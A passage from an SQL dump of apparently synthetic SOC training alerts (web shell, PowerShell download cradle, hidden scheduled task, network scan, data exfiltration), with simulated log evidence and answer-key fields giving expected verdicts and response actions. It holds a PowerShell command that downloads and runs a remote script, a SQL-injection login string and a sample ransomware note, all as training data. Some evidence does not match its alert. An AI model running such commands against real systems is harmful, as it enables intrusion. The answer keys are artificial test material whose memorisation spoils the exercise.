Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:18.959Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:45:00Z\\\",\\\"event\\\":\\\"Ransomware Note Detected\\\",\\\"source_ip\\\":\\\"192.168.15.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"ransom_note_content\\\":\\\"All your files have been encrypted. Contact us at attacker@example.com for decryption keys.\\\",\\\"attacker_email\\\":\\\"attacker@example.com\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"j.doe\\\",\\\"severity\\\":\\\"Critical\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"affected_systems\\\":[\\\"10.0.0.5\\\",\\\"10.0.0.10\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(364, 'Suspicious Web Shell Detected on IIS Server', 'high', 'IIS Server Logs', 'A suspicious web shell was detected on a telecommunications provider\'s IIS server. The attacker exploited a web vulnerability to deploy a web shell, gaining initial access.', 'Initial Access', 'T1190', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"server_ip\":\"192.168.1.50\",\"client_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/shell.aspx\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"session_id\":\"123456abcdef\",\"filename_uploaded\":\"shell.aspx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"anonymous\"}', '2026-01-03 00:54:31', '2026-02-22 10:33:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous web shell attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File commonly used as a web shell for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a web shell previously identified in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.960Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:45Z\\\",\\\"server_ip\\\":\\\"192.168.1.50\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"http_method\\\":\\\"POST\\\",\\\"requested_url\\\":\\\"/uploads/shell.aspx\\\",\\\"response_code\\\":200,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"session_id\\\":\\\"123456abcdef\\\",\\\"filename_uploaded\\\":\\\"shell.aspx\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"anonymous\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(365, 'Anomalous PowerShell Activity Observed', 'medium', 'PowerShell Logs', 'Unusual PowerShell commands were executed to download additional payloads. This behavior suggests an attempt to leverage legitimate tools for malicious purposes, commonly known as \'living off the land\'.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4104,\"process_id\":1234,\"script_block_id\":\"abc123\",\"user\":\"jdoe\",\"host\":\"DESKTOP-7A89C4K\",\"ip_address\":\"10.0.0.17\",\"command\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\"\",\"external_ip\":\"203.0.113.45\",\"downloaded_file\":\"malicious.ps1\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\"}', '2026-01-03 00:54:31', '2026-02-22 10:36:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.17\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host executing the PowerShell command.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external_threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious content.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repositories\",\"verdict\":\"malicious\",\"details\":\"Script associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.961Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4104,\\\"process_id\\\":1234,\\\"script_block_id\\\":\\\"abc123\\\",\\\"user\\\":\\\"jdoe\\\",\\\"host\\\":\\\"DESKTOP-7A89C4K\\\",\\\"ip_address\\\":\\\"10.0.0.17\\\",\\\"command\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\\\\\"IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.1.150/malicious.ps1\')\\\\\\\"\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"downloaded_file\\\":\\\"malicious.ps1\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(366, 'Creation of Hidden Scheduled Task', 'medium', 'Task Scheduler Logs', 'To ensure persistent access, Gallium APT creates a covert scheduled task, allowing them to execute scripts at regular intervals.', 'Persistence', 'T1053.005', 1, 'Closed', 177, '{\"EventID\":106,\"Timestamp\":\"2023-10-15T14:22:43Z\",\"TaskName\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\HiddenTask\",\"Action\":\"Create\",\"User\":\"COMPANY\\\\jdoe\",\"HostIP\":\"192.168.1.45\",\"AttackerIP\":\"203.0.113.54\",\"FilePath\":\"C:\\\\Windows\\\\System32\\\\hidden_task.ps1\",\"MD5Hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-03 00:54:31', '2026-02-22 10:38:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Gallium APT\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious script used by Gallium APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.962Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":106,\\\"Timestamp\\\":\\\"2023-10-15T14:22:43Z\\\",\\\"TaskName\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\HiddenTask\\\",\\\"Action\\\":\\\"Create\\\",\\\"User\\\":\\\"COMPANY\\\\\\\\jdoe\\\",\\\"HostIP\\\":\\\"192.168.1.45\\\",\\\"AttackerIP\\\":\\\"203.0.113.54\\\",\\\"FilePath\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hidden_task.ps1\\\",\\\"MD5Hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(367, 'Unauthorized Access to Network Map', 'medium', 'Network Traffic Analysis', 'The attackers initiated a network scan from an external IP address, attempting to map out the telecom infrastructure. This is part of a lateral movement strategy to identify high-value targets within the network.', 'Lateral Movement', 'T1046', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":80,\"action\":\"allowed\",\"username\":\"jdoe\",\"filename\":\"network_scan_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Network Scan Detected\"}', '2026-01-03 00:54:31', '2026-02-22 10:42:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Local network device\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized network scanning\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash found in several malware variants\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(368, 'Exfiltration of Call Detail Records Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'The Gallium APT group has successfully exfiltrated Call Detail Records (CDR) from the compromised network, targeting high-value individuals. The operation was detected as sensitive files were transferred to an external IP address.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"event_id\":\"DLP-EXFIL-005\",\"source_ip\":\"192.168.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"transferred_files\":[{\"filename\":\"target_CDR_records.zip\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"size\":\"15MB\"}],\"user\":\"compromised_user\",\"action\":\"File Transfer\",\"status\":\"Success\"}', '2026-01-03 00:54:31', '2026-02-22 10:44:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Gallium APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious file transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"target_CDR_records.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"malicious\",\"details\":\"User account compromised and used in 